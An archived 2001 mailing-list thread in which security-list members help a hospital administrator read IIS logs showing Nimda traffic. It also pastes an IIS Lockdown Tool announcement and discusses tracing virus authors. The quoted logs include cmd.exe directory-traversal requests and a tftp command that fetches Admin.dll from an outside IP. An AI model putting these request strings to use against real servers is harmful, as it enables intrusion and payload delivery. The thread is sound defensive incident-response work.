Here it is.... IIS Lockdown Tool Microsoft has released a new security tool that makes it simple to secure an IIS 4.0 or 5.0 web server. The tool, known as the IIS Lockdown Tool, allows web servers to quickly and easily be put into the right configuration ? in which the server provides all of the services the administrator wants to provide, and no others. Customers can use this tool to instantly protect their systems against security threats that target web servers. The tool offers two operating modes. The default is Express Lockdown which, with a single mouse click, configures the server in a highly secure way that is appropriate for most basic web servers. For administrators who want to pick and choose the technologies that will be enabled on the server, the tool offers an Advanced Lockdown mode. A comprehensive help system provides information and recommendations for selecting the best configuration, and an undo facility allows the most recent lockdown to be reversed. Wondering whether it's worth the time to use the tool? Consider this: a web server configured using the Express Lockdown would be completely protected against Code Red and virtually all known security vulnerabilities affecting IIS 4.0 and 5.0 ? even without the patches for these vulnerabilities. We do, of course, recommend that all customers, even those running locked-down servers, continue to stay current on all security patches, but this vividly illustrates the value of the tool. The tool is available for downloading at http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362 dldean@private Sent by: To: "J.Michael Cuciti" <mcuciti@private>, "Kuo Jimmy" owner-crime@/var/spool/majordomo/l <Jimmy_Kuo@private> ists/crime cc: crime@private Subject: RE: [RE: [RE: Any leads?]] 09/21/2001 02:46 PM Mike, Here is a good starting place http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio This link is for a Microsoft TechNet page describing security issue for web sites. They also have a "batten down the hatches" script for IIS but I cannot find the url for that page. Doug > -----Original Message----- > From: owner-crime@/var/spool/majordomo/lists/crime > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of > J.Michael Cuciti > Sent: Friday, September 21, 2001 2:33 PM > To: dldean; Kuo Jimmy > Cc: crime@private > Subject: Re: [RE: [RE: Any leads?]] > > > Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the > directories > the event view is referencing do not exist on my system. I have > followed all > instruction for removal from variuos postings from CRIME. No > file refernced > in posting are on my system. > > Do any of you know how I might stop this attack? > > -Mike > > > > dldean@private (dldean) wrote: > This is 206.98.124.52 receiving get requests for the admin.dll from > 206.98.79.246 and directory requests for his machine from > 206.252.224.50 & > 208.238.181.162 . > > Doug > > > -----Original Message----- > > From: owner-crime@/var/spool/majordomo/lists/crime > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, > > Jimmy > > Sent: Friday, September 21, 2001 2:06 PM > > Cc: crime@private > > Subject: RE: [RE: Any leads?] > > > > > > Oh, I didn't notice the followup questions you asked the first time. > > > > I don't know about the structure of your logs. But are you > 206.98.124.52? > > > > Could someone who reads IIS logs say if this is him sending or receiving > > GETs? > > > > And this is definitely Nimda. I just don't know if you're the > > target or the > > culprit. If you haven't upgraded, I'm tempting to believe > you're infected > > and attacking others. The TFTP command shows up only on or after > > infection. > > And ADMIN.DLL (Nimda is admin spelt backwards) is also something > > that shows > > up after infection. But then you say you don't have it... > > > > Jimmy > > > > > -----Original Message----- > > > From: J.Michael Cuciti [SMTP:mcuciti@private] > > > Sent: Friday, September 21, 2001 1:44 PM > > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > > > Cc: crime@private > > > Subject: Re: [RE: Any leads?] > > > > > > All: > > > > > > I still have a script trying to run, but the location and > folder doesn't > > > exist. The is what I found in my log file: > > > > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, > 206.98.124.52, 150, 151, > > > 304, > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > > > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, > 206.98.124.52, 180, 151, > > > 304, > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > > > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, > 206.98.124.52, 10, 72, > > > 273, > > > 403, 5, GET, /scripts/root.exe, /c+dir, > > > > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, > 206.98.124.52, 80, 96, > > > 1652, > > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > > > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, > 206.98.124.52, 10, 97, > > > 243, > > > 500, 123, GET, /scripts/..A ../winnt/system32/cmd.exe, /c+dir, > > > > > > If anybody knows what this is, please 'spain it to me. > > > > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I > > inherited this, not > > > my > > > fault :-) ) > > > > > > In the event log I see this same type of message running every few > > > minutes. > > > The script is supposedly running from > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > > > > > Thanks... > > > > > > Mike Cuciti > > > Network Service and Support MAnager > > > Tuality Healthcare > > > 681.1749 > > > > > > > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > > > >The Melissa author was caught because he posted the infectious > > document > > > >from his own AOL account to a news group, rather than releasing it > > > >through a hacked account. His guilt was confirmed when the > > serial number > > > >in the document matched the PC in the dumpster outside his > bedroom :-) > > > > > > No. He used a hacked acct. But we identified the exact time > of the use > > > of > > > the acct (newsgroup posting message ID) and the FBI traced the phone > > > records. > > > > > > And the PC was destroyed and never located. > > > > > > Where did you get your version of the story? > > > > > > >But Code Red and its derivatives is not an Office document, and > > > >therefore has no serial numbers. That investigators appear to have no > > > >leads months after Code Red appeared tells me that it was likely > > > >released to the wild from a compromised machine, or perhaps > > > >simultaneously released from multiple compromised machines. If the > > > >author(s) were good, then those compromised machines were initially > > > >attacked from other compromised machines. Likely all of these initial > > > >release vector machines have long since been wiped and > > re-installed, and > > > >the links to the author(s) have been cut. > > > > > > We have some "first instances" of traffic. I don't know what > the FBI's > > > doing with the information gathered so far. But I agree that it's > > > difficult > > > and not likely. > > > > > > Jimmy > > > > >
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:50 PDT